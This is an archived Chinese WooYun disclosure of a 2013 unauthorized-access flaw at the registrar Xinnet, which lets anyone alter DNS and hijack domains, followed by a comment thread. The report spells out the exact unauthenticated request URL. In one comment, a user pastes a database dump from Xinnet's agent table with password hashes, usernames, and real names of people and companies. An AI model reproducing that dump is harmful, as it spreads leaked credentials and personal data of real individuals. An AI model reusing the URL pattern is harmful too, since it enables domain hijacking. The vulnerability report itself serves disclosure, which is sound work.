当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019520

漏洞标题:新网漏洞可劫持部分在新网已注册DNS的域名和所有使用新网域名解析功能的域名

相关厂商:新网华通信息技术有限公司

漏洞作者: Finger

提交时间:2013-03-04 17:22

修复时间:2013-04-18 17:22

公开时间:2013-04-18 17:22

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-04: 细节已通知厂商并且等待厂商处理中
2013-03-05: 厂商已经确认,细节仅向厂商公开
2013-03-15: 细节向核心白帽子及相关领域专家公开
2013-03-25: 细节向普通白帽子公开
2013-04-04: 细节向实习白帽子公开
2013-04-18: 细节向公众公开

简要描述:

新网漏洞可劫持部分在新网已注册DNS的域名(即本域名下的DNS)和所有使用新网域名解析功能的域名
相关链接:
http://www.xinnet.com/service/cjwtxx/35869609204653.html

详细说明:

漏洞地址:
http://www.xinnet.com/domain/dnsmanage.do?method=getDomainNameserverVO&dnsName=已注册的本域名下的DNS
而这个地址的却做了权限验证:
http://agent.xinnet.com/domain/dnsmanage.do?method=getDomainNameserverVO&dnsName=ns1.ku6.net

漏洞证明:

打开:
http://www.xinnet.com/domain/dnsmanage.do?method=getDomainNameserverVO&dnsName=ns1.****.net

_20130305111741.jpg


直接点确定 提示【DNS ns1.***.net修改成功!】然后点击【返回管理页面】就会返回如下页面:

_20130304165649.jpg


之后【修改本域名下的DNS】、【修改域名DNS】等功能皆有权限

_20130304170449.jpg


_20130304170743.jpg


标题说还可以劫持使用新网域名解析功能的域名
那是因为可以劫持:ns*.xincache.com
http://www.xinnet.com/domain/dnsmanage.do?method=getDomainNameserverVO&dnsName=ns11.xincache.com

修复方案:

很低级的一个未授权访问

版权声明:转载请注明来源 Finger@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-03-05 17:33

厂商回复:

问题正在修复,评估后会根据相应的问题严重程度给出相应的回报。谢谢!

最新状态:

2013-03-26:已修复

漏洞评价:

评论

  1. 2013-03-04 17:22 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    能不能一次补好了啊

  2. 2013-03-04 17:22 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    卧擦嘞,第三弹

  3. 2013-03-04 17:27 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @xsser 都是一个系统的漏洞 但这个还真和上两个不一样 但这个更傻

  4. 2013-03-04 18:19 | 暗夜清风 ( 实习白帽子 | Rank:44 漏洞数:10 | 大哥,你的娃娃掉了.举手之劳,不必以身相许)

    PM求详细信息

  5. 2013-03-04 18:25 | 小亚 ( 实习白帽子 | Rank:57 漏洞数:7 | EACH DAY I AM WASTING, UNTIL YOU ARE TAS...)

    @xsser @Finger ...其实.....back-end DBMS: MySQL 5.0.11Database: xinnetTable: agent_agent[50 entries]+----+-------+------------------------------+-----------+-----------------------+---------------------+----------------------------------+---------------------+------------+------------+------------+---------------------+-------------------+------------+---------------+---------------+---------------+---------------+---------------------+------------------+--------------------------+------------------+------------------+| id | state | password | user_name | ns_handle | login_date | organ_code | apply_date | ns3_handle | ns4_handle | agent_type | start_date | ns2_handle | agent_code | refuse_reason | adm_user_code | fee_user_code | ceo_user_code | lastlogin_date | first_start_date | organize_name_cn | agent_relationer | agent_level_code |+----+-------+------------------------------+-----------+-----------------------+---------------------+----------------------------------+---------------------+------------+------------+------------+---------------------+-------------------+------------+---------------+---------------+---------------+---------------+---------------------+------------------+--------------------------+------------------+------------------+| 1 | 02 | $1$35$MyajzYaVTG5Ju3fQWU9M.0 | hy1 | ns3.chinadns.com | 2013-03-01 09:15:25 | ff8080811ce4d01d011ce5086a670001 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy1 | NULL | CLUB000000001 | CLUB000000001 | CLUB000000001 | 2013-02-28 13:04:51 | NULL | 新网测试专用账号 | 姚嵩巍 | 01 || 2 | 02 | $1$64$hdLwIFp4bxH7NdDJgdLkW1 | hy103 | ns3.chinadns.com | NULL | 101 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy103 | NULL | GTFUNGBDO03M9 | GTFUNGBL6U3JS | GTFUNGBHGQHU4 | NULL | NULL | 北京市朝阳自动化仪表厂 | 沈轶鹏 | 01 || 3 | 02 | $1$79$WZr1oyMakVRVfW/gXvAP3. | hy133 | dns.petrochina.com.cn | 2013-02-22 10:52:18 | 101 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns.xinnet.cn | hy133 | NULL | GTFUMY4V3T6L4 | GTFUMY554QQWZ | GTFUMY504T2NR | NULL | NULL | 中油物采信息技术有限公司 | 乔松 | 01 || 4 | 02 | $1$42$Hc0yqJVYADumPBPG4P5kX0 | 韩吉 | ns3.chinadns.com | 2012-12-06 17:56:49 | 101 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy244 | NULL | GTFUUKG9XS16L | GTFUUKGH7PY0N | GTFUUKGDN0LSA | 2012-10-31 14:30:15 | NULL | 李哲 | 朱正东 | 01 || 5 | 02 | $1$03$ElrdgjNJvHsAKFH0PTcyb/ | 广东省高速 | ns3.chinadns.com | 2012-10-15 12:17:25 | 108 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy274 | NULL | CLUB000000274 | CLUB000000274 | CLUB000000274 | NULL | NULL | 广东省高速公路公司 | 广东省高速 | 01 || 6 | 02 | $1$40$Il4xE8aB/wR6SXoJijTNh. | 栗姜 | ns3.chinadns.com | NULL | 101 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy3 | NULL | GTFUJ22IQ9GTO | GTFUJ22RXPEUN | GTFUJ22NAWKSR | NULL | NULL | 北京信海科技发展公司 | 栗姜 | 01 || 7 | 02 | $1$19$vZNTBm9onFGHYiwK5SbTg/ | 陈洪平 | ns3.chinadns.com | 2012-10-26 20:25:55 | 108 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy430 | NULL | GTFUCNIYLO6H1 | GTFUCNJ6ST78A | GTFUCNJ33RADD | 2012-10-26 19:30:32 | NULL | 广州市华计软件有限公司 | 陈洪平 | 01 || 8 | 02 | $1$36$GfACHPk2AY34oPu5HmK9p0 | hy593 | ns3.chinadns.com | 2013-02-27 11:17:00 | 114 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy593 | NULL | GTFUCLCKAQ9GL | GTFUCLCSO4FRA | GTFUCLCOILX3R | 2012-04-24 11:25:54 | NULL | 王 聿 | hy593 | 01 || 9 | 02 | $1$08$5NtfcsMWdGzrM1rXU.hr40 | hy602 | ns3.chinadns.com | 2012-11-26 18:51:33 | 108 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy602 | NULL | GTFUF523KCM7M | GTFUF52ALS53C | GTFUF5275HE8M | 2012-11-24 17:17:50 | NULL | 广州市天河区天平友得邦封边条批发部 | 徐晖 | 01 || 10 | 02 | $1$94$8O0zPpuxAxelqvBkGICvr1 | hy610 | ns3.chinadns.com | 2012-12-20 23:00:46 | 108 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy610 | NULL | CLUB000000610 | CLUB000000610 | CLUB000000610 | 2012-12-20 12:33:40 | NULL | 中国广东省新兴县新城镇翔顺花园新雅居12-508 | hy610 | 01 || 11 | 02 | $1$06$RkzLdeDnZ0yU2qVnbFlM9/ | hy633 | ns3.chinadns.com | NULL | 119 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy633 | NULL | GTFVI30WHZQ5B | GTFVI3157KTLH | GTFVI310TLBLC | NULL | NULL | 辽宁中孚实业有限公司 | hy633 | 01 || 12 | 02 | $1$42$H6QNL4zqNbi8uQP5k4I4/0 | hy685 | ns3.chinadns.com | NULL | 101 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy685 | NULL | GTFUCSJKIL5M9 | GTFUCSJS6ID3J | GTFUCSJOER9HD | NULL | NULL | 北京奥林狩猎俱乐部 | hy685 | 01 || 13 | 02 | $1$69$afaKTUQyUER/EdZpBrnGT0 | 胡德荣 | ns3.chinadns.com | 2012-11-26 10:36:34 | 108 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy776 | NULL | GTFUF50VMOB7K | GTFUF51352QMK | GTFUF50ZCT8RB | 2012-11-21 15:52:38 | NULL | 广州市金歌电业有限公司 | 胡德荣 | 01 || 14 | 02 | $1$30$Z5csQ8nReRtdEFjFS/c5O0 | 谢少强 | ns3.chinadns.com | 2012-04-19 18:35:52 | 108 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy8 | NULL | CLUB000000008 | CLUB000000008 | CLUB000000008 | NULL | NULL | 佛山市南海盐步科睿五金电器制品厂 | 谢少强 | 01 || 15 | 02 | $1$10$B9vzzdYPbpXDPJjgpKGTg0 | hy800 | ns3.chinadns.com | 2013-02-20 19:36:09 | 101 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy800 | NULL | GTFYN15574V3M | GTFYN15DNJZ2N | GTFYN159GBSP1 | 2012-11-23 15:38:15 | NULL | 沈冰 | hy800 | 01 || 16 | 02 | $1$18$p5EhBDeC9PkDqw4XTkt1t/ | hy865 | ns3.chinadns.com | NULL | 123 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy865 | NULL | GTFUFAK0RZOVL | GTFUFAK7W7V5P | GTFUFAK46NWXN | NULL | NULL | aLoner | hy865 | 01 || 17 | 02 | $1$98$jJdPPPXtHScEYjLoNFi9i/ | 钟日华 | ns3.chinadns.com | 2013-02-22 13:03:27 | 108 | 2009-07-26 13:35:06 | NULL | NULL | P | 2009-07-26 13:35:06 | ns4.chinadns.com | hy883 | NULL | GTFUFD05ZUDEZ | GTFUFD0H94AP8 | GTFUFD0AE9W42 | 2013-02-22 13:02:08 | NULL | 肇庆自动化仪表有限公司 | 钟日华

  6. 2013-03-04 18:29 | 暗夜清风 ( 实习白帽子 | Rank:44 漏洞数:10 | 大哥,你的娃娃掉了.举手之劳,不必以身相许)

    @小亚 des的加密 我知道是哪个站的猪肉了

  7. 2013-03-04 18:47 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @暗夜清风 闹哪样

  8. 2013-03-04 19:06 | Csser ( 路人 | Rank:11 漏洞数:6 )

    新网,这又是要干嘛- -

  9. 2013-03-04 20:42 | 小黑要低调 ( 实习白帽子 | Rank:47 漏洞数:4 | 小黑一枚)

    蛋碎了。。。

  10. 2013-03-04 21:42 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @小亚 这是? 还真没去挖新网的注入 有时间看一下

  11. 2013-03-04 22:10 | 暗夜清风 ( 实习白帽子 | Rank:44 漏洞数:10 | 大哥,你的娃娃掉了.举手之劳,不必以身相许)

    @Finger dnspod那个。你二了

  12. 2013-03-04 22:34 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @暗夜清风 哦

  13. 2013-03-05 08:37 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    @小亚 我了个去 你这是作死

  14. 2013-03-05 13:07 | along ( 实习白帽子 | Rank:45 漏洞数:7 | 关注信息安全,阿龙)

    @小亚 这直接贴出来,也太夸张了吧

  15. 2013-03-17 18:04 | 海。 ( 路人 | Rank:5 漏洞数:3 | 前进的道路也许坎坷,但阻挡不住我们的热情!)

    哈哈 继续爆火热了。

  16. 2013-04-19 08:49 | Hello_C ( 路人 | Rank:0 漏洞数:1 | 谦和温顺且自持的生活,不乱于心,不困于情...)

    我擦。。。。 被脱了啊? 小亚牛X